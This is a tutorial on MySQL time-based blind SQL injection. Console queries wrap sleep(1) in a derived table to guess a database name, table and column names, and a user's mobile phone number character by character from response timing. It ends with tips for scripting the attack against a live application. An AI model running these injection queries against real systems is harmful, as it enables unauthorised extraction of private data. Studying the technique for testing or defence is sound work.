
MySQL "time-based" blind injection

No error message from the page is needed: the judgement is made purely from how long the page takes to respond.

MySQL time-based blind injection
======================================================================

The idea: put the guess in a WHERE clause and sleep(1) in the select list. If the guess is right the row is selected, sleep(1) runs and the query takes about one second; if the guess is wrong the row set is empty, sleep(1) is never evaluated and the query returns immediately. The "0" printed in the result column is just sleep()'s normal return value.

* Guessing the database name
  - Correct guess (first character is 'f', i.e. char(0x66); note the 1.00 sec timing):
    mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);
    +----------+
    | sleep(1) |
    +----------+
    |        0 |
    +----------+
    1 row in set (1.00 sec)
  - Wrong guess (char(0x67) = 'g'; no row matches, so no delay):
    mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
    Empty set (0.00 sec)

* Guessing a table name
  - Correct guess (first table in schema fangjiangjun starts with 'f'):
    mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='f';
    +----------+
    | sleep(1) |
    +----------+
    |        0 |
    +----------+
    1 row in set (1.00 sec)
  - Wrong guess:
    mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='x';
    Empty set (0.00 sec)

* Guessing a column name
  - Correct guess for position 1 ('i') of the first column of table f_user:
    mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 1, 1)='i';
    +----------+
    | sleep(1) |
    +----------+
    |        0 |
    +----------+
    1 row in set (1.01 sec)
  - Correct guess for position 2 ('d'):
    mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 2, 1)='d';
    +----------+
    | sleep(1) |
    +----------+
    |        0 |
    +----------+
    1 row in set (1.00 sec)

* Guessing a column value
  - Correct guess for position 1 ('1') of mobile_phone in the first row of f_user (convert(..., char) so that substr works on the digits as text):
    mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';
    +----------+
    | sleep(1) |
    +----------+
    |        0 |
    +----------+
    1 row in set (1.00 sec)
  - Wrong guess for position 2 ('3'):
    mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';
  - Correct guess for position 2 ('8'):
    mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';
    +----------+
    | sleep(1) |
    +----------+
    |        0 |
    +----------+
    1 row in set (1.00 sec)

Two things to keep in mind before scripting this against a real application. sleep() is evaluated once per row that reaches it, so the derived table with "limit 0,1" above is what guarantees that a true condition costs exactly one sleep rather than one per row of the table. And over a network the decision must be made against a threshold with some margin (for example "took at least half of the requested sleep"), because ordinary latency jitter is easily mistaken for a 1-second sleep when the margin is tight.
